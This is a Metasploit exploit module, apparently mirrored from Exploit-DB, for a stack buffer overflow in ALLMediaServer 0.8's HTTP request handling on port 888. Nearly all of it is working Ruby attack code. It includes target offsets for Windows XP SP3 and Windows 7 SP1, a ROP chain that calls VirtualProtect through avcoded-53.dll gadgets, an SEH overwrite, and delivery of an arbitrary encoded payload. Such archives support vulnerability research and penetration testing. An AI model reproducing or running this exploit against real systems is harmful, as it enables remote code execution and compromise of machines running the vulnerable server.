ALLMediaServer 0.8 – Remote Buffer Overflow (Metasploit) - 体验盒子

作者： Metasploit
日期： 2012-07-16
类别：
remote
平台：
windows
来源：https://www.exploit-db.com/exploits/19857/
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'ALLMediaServer 0.8 Buffer Overflow',
			'Description'=> %q{
				This module exploits a stack buffer overflow in ALLMediaServer 0.8.
				The vulnerability is caused due to a boundary error within the
				handling of HTTP request.
			},
			'License'=> MSF_LICENSE,
			'Author' =>
				[
					'motaz reda <motazkhodair[at]gmail.com>',	# Original discovery
					'modpr0be <tom[at]spentera.com>',	# Metasploit module
					'juan vazquez' # More improvement
				],
			'References' =>
				[
					[ 'EDB', '19625' ]
				],
			'DefaultOptions' =>
				{
					'ExitFunction' => 'process', #none/process/thread/seh
				},
			'Platform' => 'win',
			'Payload'=>
				{
					'BadChars' => "",
					'Space' => 660,
					'DisableNops' => true
				},

			'Targets'=>
				[
					[ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
						{
							'Ret' =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
							'OffsetRop' =>	696,
							'jmp' =>	264,
							'Offset'=>	1072
						}
					],
					[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
						{
							'Ret' =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
							'OffsetRop' =>	332,
							'jmp' =>	628,
							'Offset'=>	1072
						}
					],
				],
			'Privileged' => false,
			'DisclosureDate' => 'Jul 04 2012',
			'DefaultTarget'=> 1))

		register_options([Opt::RPORT(888)], self.class)

	end

	def junk(n=1)
		return [rand_text_alpha(4).unpack("L")[0]] * n
	end

	def nops(rop=false, n=1)
		return rop ? [0x665a0aa1] * n : [0x90909090] * n
	end

	def asm(code)
		Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
	end

	def exploit
		#with help from mona :)
		rop = [
			nops(true, 12),#ROP NOP
			0x65f6faa7,# POP EAX # RETN
			0x671ee4e0,# ptr to &VirtualProtect()
			0x6ac1ccb4,# MOV EAX,DWORD PTR DS:[EAX] # RETN
			0x667ceedf,# PUSH EAX # POP ESI # POP EDI # RETN
			junk,
			0x65f5f09d,# POP EBP # RETN
			0x65f9830d,# & call esp
			0x6ac1c1d5,# POP EBX # RETN
			0x00000600,# 0x00000320-> ebx
			0x6672a1e2,# POP EDX # RETN
			0x00000040,# 0x00000040-> edx
			0x665a09df,# POP ECX # RETN
			0x6ad58a3d,# &Writable location
			0x6ac7a771,# POP EDI # RETN
			nops(true),# RETN (ROP NOP)
			0x6682f9f4,# POP EAX # RETN
			nops,# nop
			0x663dcbd2 # PUSHAD # RETN
		].flatten.pack("V*")

		connect

		buffer = rand_text(target['OffsetRop'])	#junk
		buffer << rop
		buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
		buffer << rand_text(target['Offset'] - buffer.length)
		buffer << generate_seh_record(target.ret)
		buffer << payload.encoded

		print_status("Sending payload to ALLMediaServer on #{target.name}...")
		sock.put(buffer)

		disconnect

	end
end